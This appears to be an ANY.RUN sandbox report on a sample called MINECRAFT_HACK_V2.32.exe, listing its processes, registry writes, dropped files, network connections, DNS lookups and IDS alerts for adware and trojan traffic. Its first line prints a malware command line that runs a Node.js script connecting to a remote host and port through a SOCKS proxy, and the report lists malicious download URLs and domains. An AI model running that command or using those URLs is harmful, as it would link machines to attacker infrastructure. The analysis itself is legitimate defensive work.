1304"C:\Users\admin\AppData\Roaming\infoSiw\nodes\node\node.exe" "C:\Users\admin\AppData\Roaming\infoSiw\nodes\cl\app.js" NODE_DEBUG=1 -s 188.42.219.232:2221 -u 00000000000000000000000000000000 --socks=localhost:2001 C:\Users\admin\AppData\Roaming\infoSiw\nodes\node\node.exe
cmd.exe
User:
admin
Company:
Node.js
Integrity Level:
HIGH
Description:
Node.js: Server-side JavaScript
Exit code:
0
Version:
8.9.4
Modules
Images
c:\users\admin\appdata\roaming\infosiw\nodes\node\node.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\gdi32.dll
Total events
7 328
Read events
5 878
Write events
1 320
Delete events
130

Modification events

(PID) Process:(3624) MINECRAFT_HACK_V2.32.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(3624) MINECRAFT_HACK_V2.32.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3060) wS1paWlpD.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3060) wS1paWlpD.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Operation:writeName:NodeSlots
Value:
0202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202
(PID) Process:(3060) wS1paWlpD.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Operation:writeName:MRUListEx
Value:
0700000001000000000000000200000006000000030000000500000004000000FFFFFFFF
(PID) Process:(3060) wS1paWlpD.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\7
Operation:writeName:MRUListEx
Value:
0000000001000000FFFFFFFF
(PID) Process:(3060) wS1paWlpD.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\53\Shell
Operation:writeName:SniffedFolderType
Value:
Generic
(PID) Process:(3060) wS1paWlpD.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\53\Shell
Operation:writeName:SniffedFolderType
Value:
Pictures
(PID) Process:(3060) wS1paWlpD.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\53\ComDlgLegacy\{B3690E58-E961-423B-B687-386EBFD83239}
Operation:writeName:Mode
Value:
1
(PID) Process:(3060) wS1paWlpD.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\53\ComDlgLegacy\{B3690E58-E961-423B-B687-386EBFD83239}
Operation:writeName:LogicalViewMode
Value:
3
Executable files
231
Suspicious files
297
Text files
7 697
Unknown types
101

Dropped files

PID
Process
Filename
Type
2248w75638d09e349.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cookies.sqlite-shm
MD5:
SHA256:
2248w75638d09e349.exeC:\Users\admin\AppData\Local\Temp\0189-60d4-602e-70d3\MailRu.ico
MD5:
SHA256:
2248w75638d09e349.exeC:\Users\admin\AppData\Local\Temp\dac6-4e7c-bf1f-0d3f\GoMailRu.ico
MD5:
SHA256:
3060wS1paWlpD.exeC:\Users\admin\AppData\Local\Temp\TMPE768.tmp
MD5:
SHA256:
2248w75638d09e349.exeC:\Users\admin\AppData\Local\Mail.Ru\Sputnik\MailRu.icoimage
MD5:
SHA256:
2976wed8489feea54.tmpC:\Program Files\Smart Application Controller\is-LANV5.tmp
MD5:
SHA256:
2248w75638d09e349.exeC:\ProgramData\Mail.Ru\Idtext
MD5:
SHA256:
2976wed8489feea54.tmpC:\Program Files\Smart Application Controller\is-BS21L.tmp
MD5:
SHA256:
2248w75638d09e349.exeC:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mail.Ru.lnklnk
MD5:
SHA256:
2976wed8489feea54.tmpC:\Program Files\Smart Application Controller\is-II1EH.tmp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
106
TCP/UDP connections
192
DNS requests
68
Threats
41

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3060
wS1paWlpD.exe
GET
104.18.52.148:80
http://mdis.fun/files/advertising/e0cf1f47118daebc5b16269099ad7347.txt
US
malicious
3060
wS1paWlpD.exe
GET
104.18.52.148:80
http://mdis.fun/files/advertising/03f544613917945245041ea1581df0c2.txt
US
malicious
2248
w75638d09e349.exe
GET
204
217.69.139.245:80
http://mrds.mail.ru/update/2/version.txt?type=install&bgn=1&standalone=1&masterid=%7B61BC1B0B-D212-4141-A951-9B7D670A1260%7D&user_id=%7B1B063FC4-C4C1-4730-8591-9FB97FD5DAB3%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=7&elapsed_time=0&mr_service=0&os=win6.1&tool=sputnik&GUID=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&common_rfr=811550&install_id=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590
RU
suspicious
2248
w75638d09e349.exe
GET
204
217.69.139.245:80
http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=desktop_mailru&event=done&masterid=%7B61BC1B0B-D212-4141-A951-9B7D670A1260%7D&user_id=%7B1B063FC4-C4C1-4730-8591-9FB97FD5DAB3%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=7&mr_service=0&os=win6.1&tool=sputnik&GUID=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&common_rfr=811550&install_id=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590
RU
suspicious
2248
w75638d09e349.exe
GET
204
217.69.139.245:80
http://mrds.mail.ru/update/2/version.txt?type=spparams&raw=--silent%20--install_browser_class%3D0%20--pay_browser_class%3D0%20%22--rfr%3Dhp.1%3A834408%2Cdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590%22%20%22--install_callback%3Dhttp%3A%2F%2Frazornow.info%2Fapi_v2%2Fcallback%2F%3Fguid&masterid=%7B61BC1B0B-D212-4141-A951-9B7D670A1260%7D&user_id=%7B1B063FC4-C4C1-4730-8591-9FB97FD5DAB3%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=7&elapsed_time=0&mr_service=0&os=win6.1&tool=sputnik&GUID=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&common_rfr=811550&install_id=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590
RU
suspicious
2248
w75638d09e349.exe
GET
217.69.139.245:80
http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=taskbar_mailru&event=done&masterid=%7B61BC1B0B-D212-4141-A951-9B7D670A1260%7D&user_id=%7B1B063FC4-C4C1-4730-8591-9FB97FD5DAB3%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=7&mr_service=0&os=win6.1&tool=sputnik&GUID=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&common_rfr=811550&install_id=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590
RU
suspicious
2248
w75638d09e349.exe
GET
217.69.139.245:80
http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=fav_gomailru&event=done&masterid=%7B61BC1B0B-D212-4141-A951-9B7D670A1260%7D&user_id=%7B1B063FC4-C4C1-4730-8591-9FB97FD5DAB3%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=7&mr_service=0&os=win6.1&tool=sputnik&GUID=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&common_rfr=811550&install_id=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590
RU
suspicious
2248
w75638d09e349.exe
GET
204
217.69.139.245:80
http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=ie_mailru&event=done&masterid=%7B61BC1B0B-D212-4141-A951-9B7D670A1260%7D&user_id=%7B1B063FC4-C4C1-4730-8591-9FB97FD5DAB3%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=7&mr_service=0&os=win6.1&tool=sputnik&GUID=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&common_rfr=811550&install_id=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590
RU
suspicious
2248
w75638d09e349.exe
GET
217.69.139.245:80
http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=ie_gomailru&event=done&masterid=%7B61BC1B0B-D212-4141-A951-9B7D670A1260%7D&user_id=%7B1B063FC4-C4C1-4730-8591-9FB97FD5DAB3%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=7&mr_service=0&os=win6.1&tool=sputnik&GUID=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&common_rfr=811550&install_id=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590
RU
suspicious
3964
MailRuUpdater.exe
GET
217.69.139.245:80
http://mrds.mail.ru/update/2/version.txt?type=mru_online&tool=mrupdater&masterid=%7B61BC1B0B-D212-4141-A951-9B7D670A1260%7D&user_id=%7B1B063FC4-C4C1-4730-8591-9FB97FD5DAB3%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.0.0.176&mailru_guard=0&mailru_updater=1&comp_mem=3583&tool_mem=5&elapsed_time=0&mr_service=0&os=win6.1&install_id=%7B4F8DC12F-1414-499E-B0B3-857E7EB20713%7D&GUID=%7B4F8DC12F-1414-499E-B0B3-857E7EB20713%7D
RU
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3060
wS1paWlpD.exe
104.18.52.148:80
mdis.fun
Cloudflare Inc
US
shared
3060
wS1paWlpD.exe
104.31.83.250:80
mfile.site
Cloudflare Inc
US
shared
2248
w75638d09e349.exe
217.69.139.247:443
xmlbinupdate.mail.ru
Limited liability company Mail.Ru
RU
malicious
2248
w75638d09e349.exe
217.69.139.122:443
conserv.go.mail.ru
Limited liability company Mail.Ru
RU
unknown
2248
w75638d09e349.exe
217.69.139.245:443
mrds.mail.ru
Limited liability company Mail.Ru
RU
malicious
2248
w75638d09e349.exe
217.69.139.245:80
mrds.mail.ru
Limited liability company Mail.Ru
RU
malicious
2248
w75638d09e349.exe
217.69.139.110:443
mailruupdater.cdnmail.ru
Limited liability company Mail.Ru
RU
malicious
217.69.139.245:80
mrds.mail.ru
Limited liability company Mail.Ru
RU
malicious
2976
wed8489feea54.tmp
109.206.179.254:80
client.updsoft.net
Serverel Inc.
NL
malicious
2360
na_runner.exe
217.69.139.245:80
mrds.mail.ru
Limited liability company Mail.Ru
RU
malicious

DNS requests

Domain
IP
Reputation
mdis.fun
  • 104.18.52.148
  • 104.18.53.148
malicious
mfile.site
  • 104.31.83.250
  • 104.31.82.250
suspicious
xmlbinupdate.mail.ru
  • 217.69.139.247
shared
conserv.go.mail.ru
  • 217.69.139.122
unknown
mrds.mail.ru
  • 217.69.139.245
suspicious
mailruupdater.cdnmail.ru
  • 217.69.139.110
unknown
xtnmailru.cdnmail.ru
  • 217.69.139.110
unknown
client.updsoft.net
  • 109.206.179.254
unknown
binupdate.mail.ru
  • 217.69.139.245
shared
gosoftdl.mail.ru
  • 94.100.180.110
shared

Threats

PID
Process
Class
Message
3060
wS1paWlpD.exe
Misc activity
ADWARE [PTsecurity] Win32.SoftPulse.gikv
3060
wS1paWlpD.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable base64 Payload
3060
wS1paWlpD.exe
Potential Corporate Privacy Violation
SUSPICIOUS [PTsecurity] PE EXE or DLL Windows file download HTTP (base64 encoded)
3956
smappscontroller.exe
A Network Trojan was detected
ET TROJAN Suspicious POST With Reference to WINDOWS Folder Possible Malware Infection
3072
mrupdsrv.exe
Misc activity
ADWARE [PTsecurity] Win32/MailRuSputnik.ru Agent PUA
3060
wS1paWlpD.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable base64 Payload
3072
mrupdsrv.exe
Misc activity
ADWARE [PTsecurity] Win32/MailRuSputnik.ru Agent PUA
2280
wa92e4e31ddfa.exe
Potentially Bad Traffic
ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla))
2280
wa92e4e31ddfa.exe
Potentially Bad Traffic
ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla))
2280
wa92e4e31ddfa.exe
Misc activity
SUSPICIOUS [PTsecurity] Suspicious HTTP header - Sometimes used by hostile installer
15 ETPRO signatures available at the full report
Process
Message
MailRuUpdater.exe
RunAsService: Entry
MailRuUpdater.exe
switches::kUpdateService run to update
MailRuUpdater.exe
Service::Update update operation is proceed
MailRuUpdater.exe
Updater.Mail.Ru: SERVICE_CONTROL_STOP
MailRuUpdater.exe
RunAsService: Exit
MailRuUpdater.exe
Service::StopService done
MailRuUpdater.exe
Service::CopyMeTo program files done
MailRuUpdater.exe
RunAsService: Entry
MailRuUpdater.exe
Service::StartService done
MailRuUpdater.exe
Updater.Mail.Ru: SERVICE_CONTROL_STOP
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
MINECRAFT_HACK_V2.32.exe